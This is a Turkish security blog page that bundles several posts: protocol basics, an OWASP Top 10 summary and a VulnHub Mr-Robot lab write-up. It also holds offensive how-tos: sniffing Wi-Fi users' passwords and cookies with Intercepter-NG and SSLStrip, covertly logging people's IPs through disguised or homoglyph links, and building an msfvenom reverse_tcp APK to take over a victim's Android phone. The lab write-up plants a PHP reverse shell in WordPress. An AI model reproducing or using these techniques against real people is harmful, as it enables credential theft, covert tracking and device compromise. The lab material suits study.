Kategoriler
Siber Güvenlik

İnternet Protokolleri (TCP,UDP,ICMP ve ARP)

Az önce NMAP ile ilgili bir yazı hazırlarken önce protokolleri ve OSI katmanlarını anlatmam gerektiğini fark ettim. Burada protokol dediğimiz şey iki makine arasındaki bağlantıyı sağlamak için oluşturulan belli kurallar silsilesidir. Bu iki makinenin iletişim kurabilmesi için bu kuralların uygulanması şarttır. Tanım sizi korkutmasın aşağıda örnekleri ile açıkladığımızda her şey aydınlanacak.

TCP Nedir?

TCP güvenli bağlantıdır. Bunun sebebi üçlü el sıkışması(three way handshake) mantığı. Önce üçlü el sıkışmasını anlatmam gerekecek elbette. A makinesi, B makinesi ile iletişim kurmak istiyor diyelim. B makinesinin çalışıp çalışmadığını anlamak için, içinde kendi bilgilerinin olduğu bir SYN paketi gönderiyor. Eğer RST+ACK paketi dönerse bu karşı makinenin kapalı olduğu anlamına gelir ve iletişim burada biter. 

Ancak diyelim ki B makinesi açık ve paketi aldı. Bu durumda o da kendi bilgilerini barındıran SYN+ACK paketi gönderir. A makinesi de mesajı aldığını belirtmek için ACK paketini iade eder. 

Bir arkadaşımın özeti ile durum şudur :

*Merhaba, ben Çağlar.

-Merhaba ben de Oğuz Atay.

* Tanıştığıma memnun oldum.

UDP Nedir?

UDP, güvensiz protokoldür. Bunun sebebi üçlü el sıkışmasının gerçekleşmemesi. Paketler kontrolsüz bir biçimde gönderilir. Teyit işlemi yapılmaz. Bu teyit işlemi olmadığı için de UDP ile gönderilen paketler daha hızlı bir iletişim sağlar. Paket gider, dönüş yoksa karşı makine kapalı kabul edilir, dönüş varsa açıktır. 

Şimdi hazır ikisini anlatmışken şunu da belirtmem gerekiyor, internet ortamındaki canlı yayınlar, görüntülü konuşmalar, anlık sesli konuşmalar UDP paketleri ile yapılır. Çünkü paketlerin tamamen iletilmesinden ziyade hızlı iletişim önemlidir bu kullanım alanlarında. Basit bir benzetme yaparsak karşınızdaki kişi konuşurken bir iki harf gelmezse bunu tamamlayabilirsiniz ve çok rahatsız olmazsınız. Fakat geriden gelen veya donan bir canlı bağlantı işinize gelmeyecektir. TCP ise paketlerin kaybolmasını önlüyor. Yaptığınız dönem ödevinin hocanıza eksik gitmesini istemezsiniz değil mi? İşte bu durumda TCP devreye girer ve her paket güvenle karşı tarafa ulaşır.

ARP Nedir?

ARP’ın üstüne vazife olan iş, mevcut paketten aldığı ip adresinin MAC adresini öğrenmek. Ana makineye gider ve bu ip adresinin mac adresi nedir diye sorar. Aldığı cevabı da bu iletişim dünyasına dahil eder.

ICMP Nedir?

ICMP ise bir bilgilendirme protokolüdür. Paket aktarımı sırasında bir hata olması, bağlantı kopması, paketin ulaşmaması durumunda, paketi gönderen makineye gider ve durumu haber verir. Bu sayede paket tekrar gönderilir.


Diğer protokollere de hızlıca bir dokunmak istiyorum. FTP, dosya transferi için hazırlanan protokoldür. Örnek vermek gerekirse web sitenize ait dosyaları gönderirken bu protokolü kullanırsınız. SMTP ise eposta gönderimlerinde rol alır. IMAP ve POP3 de eposta protokollerindendir. IMAP sayesinde epostalarınızı ve onlara ek olarak yüklenen dosyaları indirmeden de erişebilirsiniz. Bu sayede her cihazdan, her yerden, daha az veri kullanımı ile epostalarınıza ulaşırsınız. Ancak POP3 kullanıyorsanız tüm postalar sizin sisteminize indirilir ve indirmeden erişilmez.

 

BAYRAKLAR

  • URG : Öncelik belirten bayrak
  • ACK : Onay bayrağı. Paket alındı/teslim edildi anlamına gelir.
  • PSH : Veri iletimi. Push kelimesinden gelir.
  • RST : Kapalı port bildiren bayrak.
  • SYN : Senkron bayrağı.
  • FIN : Bağlantı sonlandırma bayrağı.
Kategoriler
Siber Güvenlik Video

Intercepter ile İnternet Ağını İzleme

İntercepter isimli mobil uygulama, bizim bağlı olduğumuz wifi ağındaki diğer bütün cihazları izlememizi sağlıyor. Ağdaki bütün paket akışını görebiliyoruz. Bu paketlerin içinde kullanıcı adı ve parola gibi önemli bilgiler de yer alabiliyor. Bunların dışında girdikleri siteye ait fotoğrafları görebiliyoruz. Google Play’de bulunmayan bu uygulamayı kullanmak için cihazınızın rootlu olması gerekiyor. İndirme linki : http://www.mediafire.com/file/cm6dvpikdx139mi/Intercepter-NG.2.1_www.siberyazilimci.net.apk

“Skip scanning” seçeneği ile taramayı geçebiliriz. Veya sağında bulunan yön butonu ile ağı taramaya başlayabiliriz. Bağlı olduğum wifi ağındaki diğer cihazları mac adresi, yerel ip adresi ve işletim sistemi ile beraber bana listeliyor ikinci görselde gördüğünüz gibi. Başlarındaki ufak ikonlar cihazların işletim sistemini gösteriyor. Sağ kısımlardaki tikleri seçerek istediğim cihazları tarayabilirim. Aynı zamanda select all seçeneği ile tamamını da seçmem ve izlemeye başlamam mümkün.

Daha sonrasında gelen ekranda ayarlar sekmesine geçerek SSLStrip seçeneğini seçiyoruz. Bunun sebebi ise ağdaki diğer kullanıcının güvenlik desteği olan https bağlantısı ile herhangi bir siteye giriş yapması halinde bu bağlantıyı http ile değiştirerek şifresiz paketleri izlememizin daha kolay olmasıdır. SSL’i kısaca anlatmak gerekirse, https bağlantılı sitelere verdiğimiz isimdir. Güvenli bağlantı olan https, paketleri şifreli olarak karşı sunucuya gönderir ve bizim bunları izlememiz güçleşir. Ancak karşı taraf http ile işlem yaparsa bunları kolayca izleyebiliriz. Örnek vermek gerekirse, Facebook, Twitter ve İnstagram gibi web siteleri güvenli bağlantı kullanır ve kullanıcılarının izlenmesini önlemeye çalışır.

Şimdi ilk sekmeye dönerek intercepter taramasını, ikinci sekmeden de paket taramasını başlatıyorum. Sol üst kısımdaki “play” tuşuna dokunmanız yeterli. Kurabiye ikonlu üçüncü sekmemizde çerez bilgileri yer alırken dördüncü sekmede karşı tarafın girdiği sitede bulunan görsel dosyalar listelenir. Şimdi taramayı sevdiğim teknoloji blogu Webtekno üzerinde test edelim. Webtekno, güvenli bağlantı kullanmıyor. Haliyle tüm paketler bana şifresiz biçimde ulaşacaktır. 

Şimdi siteye üye girişi yapmayı deneyelim. İlk başta hatalı bir giriş yapıyorum. Program tüm paketleri topluyor. Ardından doğru giriş yapıyorum. Yine aynı şekilde paketler listeleniyor. Intercepter hatalı veya doğru giriş ayırt etmeksizin bize kullanıcı adı ve parola bilgilerini gösterdi. İkinci sekmedeki paketler de aynı şekilde akmaya devam ediyor. Bu paketleri detaylıca incelemeyi wireshark ile ilgili bir yazı hazırladığımda anlatmayı planlıyorum.

Görseller sekmesine dönersek bana siteye ait tüm görselleri listelemeye başladı. Çerezler kısmında da herhangi birine tıklamam halinde detaylı bilgileri kopyalayacak ve o siteye giriş yapacak.

Taramayı durdurduktan sonra eğer kaydetmek istemiyorsak ayarlar kısmından Clear res ve clear pcap seçenekleri ile listelenen tüm bilgiler siliniyor. Yaklaşık beş dakikalık bir tarama bende 100mb civarında yer kapladı ve sürekli olarak saklamanın benim cihazımda yer sıkıntısına sebep olduğunu fark ettim. Bu ağdaki paket akışının ne kadar olduğu ile de ilgili. Tercih sizin.

Kategoriler
Siber Güvenlik

İplogger Kullanarak İp Adresi Tespit Etmek

IPLOGGER.ORG

Bu sefer bahsini edeceğim şey siber güvenlik noktasında çok önemli bir şey olmamakla beraber pratik bir detay olabiliyor. İplogger, sizin için linke tıklayanların ip adresini alır ve daha sonra sizin verdiğiniz siteye yönlendirir. Sıradan bir kullanıcının fark etmesi pek de mümkün değil. Umarım “ip adresin elimde modemini yakacağım.” lafları için kullananlar okumuyordur.

Öncelikle iplogger.org adresine kayıt oluyoruz. Daha sonra karşımıza çıkan bu ekrana karşı tarafın ip adresini alır almaz hangi adrese yönlendirmek istiyorsak onu yazıyoruz ve shorten butonuna basıyoruz.

Daha sonra aşağıdaki gibi bir ekranla karşılaşıyoruz. Bizim için önemli olan kısımlara değineceğim.  Üçüncü seçenekteki linke tıklayan herkesin ip adresi, tarayıcı ve işletim sistemi bilgileri, tahmini konum bilgisi kayıt olacaktır. Dördüncü kısımda ise yönlendirilecek adresi değiştirmemiz mümkün. Beşinci, yani Google short url kısmından ise goo.gl adresinden size mevcut linki kısaltarak verecektir. Nihayetinde karşı tarafa iplogger domainli bir link göndermek çok akıllıca olmayabilir. Kısaltılmış linke tıklayan birisi bir süre o adreste kalacak sonrasında direk olarak caglar-celik.com adresine geçecek. İplogger domaini fark edilmeyecek.

Bir sonraki seçenekte ise ip adreslerinin listesi mevcut. Bunu başkaları ile paylaşmanız mümkün.

Son iki seçenek ise forumlara ve HTML web sitelerine görsel olarak log koymak için hazırlanmış. O kodları forum mesajınıza veya web site kodlarınızın arasına koyduğunuzda herhangi bir önlem yoksa görünmeyecektir ve o sayfaya girenler otomatik olarak linke tıklamış kabul edilecektir. En alttaki ufak alandan ise link adresinde düzenlemeler yapmanız ve PDF, MP3 gibi farklı uzantılarda bir dosyaymış gibi göstermeniz mümkün. Ancak link kısalttığınızda bir anlamı kalmayacaktır.

Logged IP’s sekmesine gelelim. Burada ise sizi tıklayanların listesi karşılıyor. Tarayıcı detayları için sağ taraftaki info ikonuna tıklamanız yeterli. Ayrıca işletim sistemini de buradan öğrenmeniz mümkün. Mobil işletim sistemleri ve versiyonları da buna dahil.

Summary Data View kısmında ise bir harita mevcut. Burada hangi ülkeden ne kadar tıklanma aldığınızı görebilirsiniz. Ayrıca sayfayı aşağıya kaydırdığınızda yine işletim sistemi vb. özelliklere göre kaç kişinin tıkladığı istatistiği de grafiksel olarak verilmiş.

CyberHub İplogger

Sırada başka bir web sitesi var. Bu site de iplogger görevi görüyor fakat farklı olarak domain adresleri daha bir inandırıcı. Örneğin twitter.com domaininin harflerinden birinin altında hafif bir çizik var, başka bir domainde bir harf altında bir nokta… Domainler Yunan alfabesi gibi farklı harflerden seçilerek latin alfabesi ile alınan popüler domainlere benzetilmiş. Ve bu adreslere tıklayan herkesin ip adresini kaydediyor. 

Domain seçiminden sonra domaini yandaki butonla kopyalayıp karşı tarafa gönderiyoruz. Arkasından “IP Logger Key” adresini başka bir yere kopyalayıp saklıyoruz. Onunla sorgu yapacağız. Linki dağıttıktan sonra tıklayanların bilgilerini toplamak için Key kısmına aldığımız numarayı yapıştırıyoruz. Sonrasında da “Get Result” diyoruz. Tıklayanların ip adresi ve saat-tarih bilgileri karşımıza çıkıyor.

Kategoriler
Siber Güvenlik

OWASP Top 10 2017 Raporu

OWASP Nedir?

OWASP (Open Web Application Security Project), web uygulamalarının güvenliği için çalışma yapan özgür bir topluluktur. OWASP’a ait dokümanlar ve araçlar herkese açıktır. OWASP’ın hiçbir şirket ve kuruluşla bağı yoktur ve tamamen topluluğun ihtiyaçlarını gidermek üzerine çalışmalar yürütmektedir. OWASP Vakfı, projenin uzun vadeli başarısını sağlayan kar amacı gütmeyen bir kuruluştur. OWASP ile ilişkili hemen hemen herkes, OWASP kurulu, bölüm başkanları, proje liderleri ve proje üyeleri de dahil olmak üzere bir gönüllüdür.

OWASP Top 10 listesi birkaç yılda bir güncellenir. Tüm web açıklarını belli bir puan sistemine göre sıralar ve en popüler on açık listesini yayınlar. Aynı zamanda listede açıklar için öneriler de yer alır.Aşağıda 2017 listesi mevcuttur. Puanlama sistemine yazının devamında yer vereceğim.

OWASP TOP 10 2017 PUAN
A1: Injection 8.0
A2: Broken Authentication( and Session Management) 7.0
A3: Sensitive Data Exposure 7.0
A4: XML External Entities (XXE) 7.0
A5: Broken Access Control 6.0
A6: Security Misconfiguration 6.0
A7: Cross-Site Scripting (XSS) 6.0
A8: Insecure Deserialization 5.0
A9: Using Components with Known Vulnerabilities 4.7
A10: Insufficient Logging & Monitoring 4.0

A1 : Injection

İstismar Edilebilirlik: 3 Yaygınlık: 2 Tespit Edilebilirlik: 3 Teknik: 3

SQL, NoSQL, OS, and LDAP enjeksiyon gibi kusurlar, saldırganların verileri izinsiz bir şekilde okumasına ve komut çalıştırmasına sebep olabilir. Keşfedilmesi kolaydır. Enjeksiyon, veri kaybedilmesi, verilerde değişiklik yapılması ve saldırganın admin hesabını elde etmesi ile sonuçlanabilir.

 

A2: Broken Authentication (and Session Management)

İstismar Edilebilirlik: 3 Yaygınlık: 2 Tespit Edilebilirlik: 2 Teknik: 3

Tahmini kolay ve brute force sistemi ile kırılabilen şifreler bir web sitesi için tehdit demektir. Aynı zamanda giriş denemelerine kısıtlama konulmaması ve captcha kullanılmaması da zafiyetlerden birisidir. Bu şekilde getirilen sınırlamalar ve önlemler brute force saldırılarından web sitesini büyük oranda kurtaracaktır.

Sitemizi ziyaret eden her kullanıcıya bir değer atarız. Bu değer o kişinin hangi yetkiye sahip olduğunu da belirtir. Ancak bu zaafiyeti de beraberinde getirir. Örnek vermek gerekirse saldırgan, siteye ziyaretçi olarak girer ve ona bir id atanır. Bu id linkte yer alıyorsa linki görebileceği bir sayfa hazırlayarak kurbanın o sayfaya girmesini sağlar. Bu durumda kurbanın id’sini elde eden saldırgan, onun yetkileri ile sitede gezinebilir.

Bazı web siteleri ise parolamı unuttum seçeneğine mail girilmesi halinde direk olarak maile yeni şifreyi gönderir. Saldırgan, sürekli olarak kurbanın mailini bu sisteme girerse, saldırgan söz konusu web sitesine giriş yapamayacaktır.

Şifre yenileme ekranında eski parolanın sorulmaması da bu alandaki zafiyetlerden birisidir. Ayrıca mail aktivasyonu yapılmadan kayıt yapılan siteler ve üye girişi sonrası çıkışı mümkün olmayan sistemler de bu başlık altında incelenebilir.

A3: Sensitive Data Exposure

İstismar Edilebilirlik: 2 Yaygınlık: 3 Tespit Edilebilirlik: 2 Teknik: 3

Bu açığın sebebi önemli verilerin saklanmaması, şifrelenmemesi veya bilinen şifreleme algoritmaları ile saklanmasıdır. Kredi kartı, parolalar, adres ve kimlik bilgileri gibi önemli olduğuna inandığımız bilgileri güçlü algroitmalar ile şifrelemek sağlıklı olacaktır.Aynı zamanda bilgiler sunucuya şifrelenmeden ulaşıyorsa bu da bir risk oluşturacaktır. Sunucu ve kullanıcı arasındaki ağı takip eden bir saldırgan önlem alınmayan bu verileri elde edebilir. Bunun için https gibi güvenli protokolleri kullanmak faydalı olacaktır. Diğer yandan sistemdeki default parolaları da değiştirmek gerekir.

A4: XML External Entities (XXE)

İstismar Edilebilirlik: 2 Yaygınlık: 2 Tespit Edilebilirlik: 3 Teknik: 3

Bu açık yanlış configure edilmiş XML dosyalarının sabote edilmesine sebep olur. Saldırgan, sunucuya zararlı yazılım yer alan XML dosyası göndererek dosyaları okur, dos saldırısı gerçekleştirir ve komut çalıştırır. Çözüm olarak ise XML kütüphanelerini güncel tutmak, XML External Entity özelliğinin kapatılması ve sunucuda “whilelisting” kontrolünün yapılması gerekir.

A5: Broken Access Control

İstismar Edilebilirlik: 2 Yaygınlık: 2 Tespit Edilebilirlik: 2 Teknik: 3

Bu açık kullanıcı yetkilerinin doğru oluşturulmamış olmasından kaynaklanır. Daha açıklayıcı olarak aşağıdaki örnekte açıklayabiliriz.

example.com/app/accountInfo?acct=enes

Biz acct parametresini değiştirelim ve başka bir kullanıcının bilgilerine ulaşmayı deneyelim.

example.com/app/accountInfo?acct=Admin

Verilen linkte kullanıcı adı kısmı değiştirilerek başka kullanıcıların verileri elde edilebilir. Hatta bir wordlist ile farklı kullanıcı varyasyonları da temin edilebilir. Öte yandan admin gibi yetkili kullanıcılar da kullanılabilir. Bu durumda link yapısının doğru yapılması, izinlerin düzgün planlanması ve her açıkta olduğu gibi bunda da log kayıtlarının incelenmesi güvenlik adına önem taşımaktadır.

A6: Security Misconfiguration

İstismar Edilebilirlik:3 Yaygınlık: 3 Tespit Edilebilirlik:3 Teknik:2

Gereksiz servis ya da eklentilerin kurulması ve sonrasında unutulmasından kaynaklanan açıktır. Ayrıca OWASP’a göre en çok bulunan açık çeşididir. Bu sistemlerin güncel olmaması, default parolalar ile kalması güvenlik tehditlerini oluşturur. Çözüm olarak ihtiyaç duyulmayan servisler kaldırılmalı, default parolalar değiştirilmeli. Aynı zamanda sistem güncel tutulmalıdır.

A7: Cross-Site Scripting (XSS)

İstismar Edilebilirlik:3 Yaygınlık: 3 Tespit Edilebilirlik:3 Teknik:2

Türkçe karşılığı siteler arası betik çalıştırma olan bu zaafiyet, bir web sitesi üzerinde izinsiz olarak HTML, CSS veya Javascript gibi kod parçacıkları çalıştırmaya yaramaktadır. Bir sitenin XSS zaafiyeti bulundurması, o sitenin kullanıcılarının tarayıcılarında zararlı kod çalıştırılmasına zemin hazırlamaktadır.Bu da kullanıcıya ait parola, çerezler vb. bilgilerin ele geçirilmesi ile sonuçlanır. XSS önlemi alan frameworkler kullanılması ve toplum mühendisliği saldırılarına karşı bilinçlendirme çalışmaları alınacak önlemler listesinde yer almaktadır. Aynı zamanda web sitesine dair veriler elde etmek de mümkündür. XSS, kendi içerisinde üçe bölünür.

Reflected XSS : Mevcut zaafiyetin en yaygın alt dalıdır. Saldırgan, bulduğu XSS açığını kötüye kullanarak bir link hazırlar ve bunu kullanıcıya gönderir. Kurban gönderilen linke tıklarsa açığa kurban gider. Bu yüzden diğer çeşitlerine nazaran daha az önem arz ettiği kabul edilmektedir.

Örnek vermek gerekirse, aşağıdaki olağan link ikinci verilen örnekteki kod parçacığı çalıştırılabilir.

http://www.site.com/search.aspx?keyword=caglar

http://www.site.com/search.aspx?keyword=<script>alert(/caglar/)</script>

Stored XSS : Bir önceki örneğimizden farklı olarak yalnızca linki açan kullanıcı değil, o sayfayı görüntüleyen herkes saldırıya uğramış olur. Herhangi bir toplum mühendisliğine başvurmak gerekmeksizin saldırgan, kullanıcılara erişir. Zararları diğer çeşitlerine nazaran daha fazladır.

DOM Tabanlı XSS : Bu XSS çeşidi HTML üzerinden değil de DOM objeleri üzerinden uygulanır. Reflected örneğindeki gibi kullancıya bir link bırakılır fakat kullanıcı linke girdiğinde bilgiler site üzerinden gönderilmez. Kullanıcının oturum bilgileri, saldırganın elinde tuttuğu farklı bir web sitesine gönderilir.

A8: Insecure Deserialization

İstismar Edilebilirlik:1 Yaygınlık: 2

Tespit Edilebilirlik:2

Teknik:3

Bu zaafiyet ile web sitesine dos saldırında bulunmak ve komut göndermek mümkündür. Kullanıcılardan gelen verilerin kontrol edilmemesinden kaynaklanmaktadır.

A9: Using Components with Known Vulnerabilities

İstismar Edilebilirlik:2 Yaygınlık: 3 Tespit Edilebilirlik:2 Teknik:2

Security misconfiguration ile benzer olmakla beraber mesele burada biraz daha farklıdır. Bilindik bir exploiti bulunmasına karşın sistem veya uygulamaların aynı sürümünün kullanılması bu zaafiyetin listede yer almasına sebep olmuştur. Çözüm olarak ise sistem ve uygulamaları güncel tutmak gerekmektedir. Kullanılmayan ve gereksiz uygulamalar kaldırılmalıdır. başta exploit-db.com olmak üzere birçok yerden güncel exploitleri temin edebilirsiniz. Güncel olarak ortaya çıkan exploitleri takip ettikten sonra buna göre önlem almak da mümkün.

A10: Insufficient Logging & Monitoring

İstismar Edilebilirlik:2 Yaygınlık: 3

Tespit Edilebilirlik:1

Teknik:2

Log kayıtlarının yeterli oluşturulmaması ve incelenmemesinden kaynaklanan sıkıntılardır. Önemli işlemler ve başarılı/başarısız giriş denemelerinin kayıt altında olması gerekir. Bu durumda arka arkaya yapılan giriş denemeleri bir yerden sonra log kayıtlarını analiz eden sistem veya görevli tarafından dikkat çekecektir ve öncesinde önlem alınacaktır. Brute force saldırılarının yanı sıra listedeki diğer açıkların da tespiti logların izlenmesi sonucunda erkenden önlenebilir.

Detaylı bilgiler ve kaynakça :

 

Hazırladığım sunum PDFine şu linkten ulaşabilirsiniz : https://drive.google.com/file/d/1U7_6uzGO9xvpCC1fGgmjOapX_Fy9ovh7/view?usp=sharing

Kategoriler
Siber Güvenlik Video

Görsellere Dosya ve Metin Saklamak [Stenografi]

Stenografi esasında söylenenlerin çabucak, kısaltmalarla, belli sembollerle yazılması anlamına geliyor. Fakat bizim inceleyeceğimiz nokta biraz farklı. Stenografi aynı zamanda görsellere bir şeyler saklamaktır diyebiliriz. Örnek vermek gerekirse milattan önceki dönemlerde gizli mesajlaşmalar için kölelerin saçlarını kazırlarmış, kafasına gizli metni yazarlarmış. Daha sonrasında ise saçlarının uzaması beklenirmiş. Arkasından da mesajın ulaşacağı kişiye gönderilirmiş. Mesajı okumak isteyen kişi ise kölenin saçlarını tekrar kazıyarak metne ulaşırmış. 

İkinci Dünya Savaşı sırasında da Almanlar magazin dergilerinin, gazetelerin ara satırlarına görünmez mürekkep ile mesajlarını yazarak düşmanlarına bilgi kaptırmadan uzun süre haberleşmişler.

 

E tabii şimdi teknoloji başka bir boyutta. Haliyle bizim kullanacağımız yöntem de farklı olacak. Biz dijital görsellerin içerisine bazı ufak dosyaları veya metinleri gizleyeceğiz. Ben bunun için SilentEye isimli programı kullanacağım. Buraya tıklayarak dosyayı indirmeniz mümkün.  Programın açılışında bizi basit bir ekran karşılıyor. Öncelikle görsel seçmeniz gerek. İster File kısmından Open seçeneğini seçin (CTRL+O) ister görselinizi direk olarak programın üstüne sürükleyin. 

 

Daha sonrasında Encode seçeneğine geçiyoruz. Bizi karşılayan ekranda en üstte bulunan Media’s encoding format seçeneğinden JPEG veya BMP formatlarını seçmeniz mümkün. 

Daha sonra luminance interval kısmından parlaklık üstünde oynamanız mümkün. JPEG quality ile görselin kalitesini ve haliyle boyutunu değiştirmeniz mümkün. Boyut meselesi önemli son aşamada oraya da değineceğiz. Header position kısmı ile şifreli metnin yer alacağı kısmı belirlemeniz mümkün. Sonuçta birkaç bitlik veriler resme işleniyor.  Passphrase kısmı da anladığınız üzere şifre kısmı. Dilediğiniz şifreyi girin ve aynı şifreyi karşı tarafa da verin. Daha sonra gizli verinin yer aldığı fotoğrafı nereye kaydedeceğinizi seçin. Son olarak ister metin yerleştirin ister sağ taraftaki seçeneklerden bir dosya tercih edin.

 Gelelim işin decode yani şifreli görseli açma aşamasına. Programa tekrar sürükleyerek veya file kısmından open diyerek şifrelenmiş görseli programa atıyoruz ve decode seçeneğine geçiyoruz. Sonrasında doğru şifreyi giriyoruz. Biraz beklediğimizde bize içerisindeki gizli veriyi veriyor program. Son olarak şuna dokunmam gerekiyor, görselin boyutu büyüdükçe içine yerleştirebileceğiniz verinin boyutu da artacaktır. Bu yüzden boyut önemlidir görsellerde.

Kategoriler
Linux Siber Güvenlik

Mr-Robot Pentestlab Challange

PentestLAB içinde üç adet flag bulunmaktadır. Beginner düzeyinde olan Mr-Robot PentestLAB indirme linklerine ve lab hakkındaki diğer bilgilere Vulnhub’dan ulaşabilirsiniz.
https://www.vulnhub.com/entry/mr-robot-1,151/

PDF formatında çözüme şuradan ulaşabilirsiniz : https://drive.google.com/open?id=1EmGawNq-cc1aY-agVj-5qaQTwnA3tQNK

Verilen sanal makineyi kurduktan sonra NAT ağına bağladım. Girişte şifre ekranı ile karşılaştım. Bu demektir ki direk makineye erişimim yok. Başlangıçta herhangi bir bilgi de verilmiyor.

Linux tabanlı ParrotOS işletim sistemim üzerinden işlem yapmaya başlıyorum. “ifconfig” komutu ile ip aralığımı öğreniyorum.

Daha sonra pentestlabın ip adresini temin etmek için netdiscover aracılığı ile bir tarama gerçekleştiriyorum. 192.168.247.131 benim pentestlabımın adresi.

netdiscover -r 192.168.247.128

“192.168.247.131” adresine ait açık portlara bakmak gerek. Bir nmap taraması başlatıyorum. 22 portu kapalı olmasına rağmen karşıma çıkartıyor. 80 portu açık. Bu demektir ki web üzerinden işlem yapabilirim.

Daha sonra bu adresi Mozilla tarayıcıda yokluyorum. Terminal görünümü verilmiş bir web sitesi karşılıyor beni.  Seçenekleri yokluyorum fakat herhangi bir ipucuna rastlamıyorum.

Nikto aracı ile bir tarama yapıyorum ve birkaç uzantı karşıma çıkıyor. “robot.txt” ve “license.txt” dikkatimi çekiyor. İkisini de tekrar tarayıcıma yazıyorum. Daha önemlisi sitenin wordpress olduğunu ve apache server kullandığını anlıyorum.

“robots.txt” içerisinde üç flagden birisi ve bir wordlist mevcut. İlk flagimi not alıp admin panelini yokluyorum.

Şimdi admin paneline giriş yapmayı deniyorum. “Admin:admin” veya “admin:password” denemelerim başarılı olmayınca fark ediyorum ki kullanıcı adı admin değil. Ana temamız Mr Robot’tan yola çıkarak kullanıcı adına “elliot” demeyi deniyorum. Kullanıcı adı doğru fakat sık kullanılan parolaları test etsem de parolayı bulamıyorum. “robots.txt” ile elde ettiğim wordlist burada işe yarayacaktır diye tahmin ederek bir tarama başlatıyorum.

Wp-scan aracı ile tarama başlatıyorum fakat bu oldukça uzun sürüyor.

wpscan –url 192.168.56.101 –username elliot –wordlist /home/deneyimsizdenek/Desktop/fsocity.dic

Nihayetinde şifre ortaya çıkıyor.

Giriş yapmayı deniyorum ve beni wordpress admin paneli karşılıyor.

Şimdi de siteye shell yedirmek için menüde şu yolu izliyorum : Appearance > Editor > 404.php
404.php sayfasına belirlediğim php shelli yerleştiriyorum.Shell üzerindeki ip adresi kısmını ve port kısmını düzenliyorum.

Shelli şuradan indirebilirsiniz : https://drive.google.com/open?id=1ieRK9Zg-MF_XeGNGTsVUNqWoDytpjHuA

Daha sonra “1234” portunu dinlemeye başlıyorum. Listening karşılığını aldıktan sonra “192.168.247.131/404.php” adresine giriyorum. “$” işareti ile shelli başlattığımı anlıyorum.

“ls” komutu ile klasörleri listeliyorum. “Root” klasörüne erişim iznim yok, fakat mevcut kullanıcım ile hak elde edeceğim daha sonra. Şimdilik home klasörüne ardından da robot klasörüne giriyorum. (Örnek komut : cd home veya cd robot) Daha sonra karşıma password.raw-md5 ve key-2-of-3.txt dosyaları çıkıyor.İkinci keye erişim iznim yok fakat md5 dosyasına var. Ve sonuç karşımda…

Elde ettiğim md5’i crackstation.net sitesinde kırmayı deniyorum. Ve şifrenin “abcdefghijklmnopqrstuvwxyz” olduğunu buluyorum. Kullanıcı ismi ise “robot”.

PentestLAB login kısmına bu bilgilerle giriş yapmayı deniyorum.Giriş yapıyorum fakat root yetkilerine sahip değilim. Nmap kullanarak root klasörüne erişiyorum ve son flagi elde ediyorum.

Kategoriler
Siber Güvenlik Teknoloji

Herkes İçin Siber Güvenlik

Sıcak bir hava ve deniz kenarındasınız. Şezlonga uzanmışsınız. Tatil harika gidiyor. Bir fotoğraf çekip atıyorsunuz İnstagram’a, beğeniler akıyor. Peki, bunun aslında güvenlik açığı olduğunu düşündünüz mü hiç? Kimileri için senaryo şu şekilde devam ediyor: Teknolojiyi derinlemesine kullanan hırsızlar sizin bu fotoğrafla tatilde olduğunuzu, evinizde olmadığınızı anlıyor. Böylece rahat rahat evinize giriyor.
 
Başka bir örnek. İnternette geziniyorsunuz. Harika bir tişört var. Siz bunu sipariş vermek için kart bilgilerinizi giriyorsunuz. Güvenilir marka canım dalavere olamaz. Ürün kapınıza da geliyor. Fakat daha sonra bir hacker o siteyi hackledikten sonra sizin kredi kartınıza ulaşıyor. Üstelik bunlar herkese açık forumlarda paylaşılıyor rahatça. Hatta bunu yapan 13 yaşında bir çocuk da olabiliyor. Öyle ki sanal ortamdaki hırsızlığın ciddiyetini idrak edemiyor çocuk.
 
Herkes İçin Siber Güvenlik

Daha başka örnek kişisel bilgileriniz hackleniyor ve istihbarat servisleri satın alıyor hackerlardan. “Amancanım ne var benim kişisel bilgilerimde bilmem hangi istihbarat örgütü benim bilgilerimi ne yapacak?” diyorsunuz ya, işte iş ülke genelinde olunca durum kritik oluyor. Facebook, google sizin internet gezintinizi takip ediyor ve reklamları dahi ona göre ayarlıyor. Konum özelliği ile nerede olduğunuzu, mikrofon özelliği ile neler konuştuğunuzu dinliyor. Bunların hepsi bir yerde toplanıyor. Siz işi hafife alırken birileri fotoğraflarınızdan nerede olduğunuzu, hangi makine ile o fotoğrafı çektiğinizi buluyor ve hatta parmak izinizi kopyalıyor.

 
Durum böyle olunca kullanıcıların daha dikkatli olması gerekiyor. Güncel bir antivirüs programı kullanmalısınız. İnternet ortamında her şeyi paylaşmamalısınız, her siteye girmemelisiniz. Telefonda veya bilgisayarda kullandığınız araçlara ne kadar izin verdiğinizi kontrol etmelisiniz.
 
Ege Olay Gazetesi : http://www.egeolay.com/yazar-sosyal-medyanin-guvenilirligi-455.html
Kategoriler
Android Linux Metasploit Siber Güvenlik

Metasploit ile Android Telefona Sızma

Metasploit linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır. Windows üzerinde de kullanmanın bazı yolları var. Ancak bu yazıda onu anlatmayacağım.
 
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
 
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
 

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=1604 R > Desktop/test.apk

Sahte apk oluşturma
 
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Windows’ta komut penceresine ipconfig yazarak öğrenebilirsiniz. Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş arkaplanda.
 
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
 
Daha sonra msfconsole yazarak yavaştan başlıyoruz.
 
metasploit giriş
 
Daha sonra sırası ile aşağıdaki komutları giriyoruz.
  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
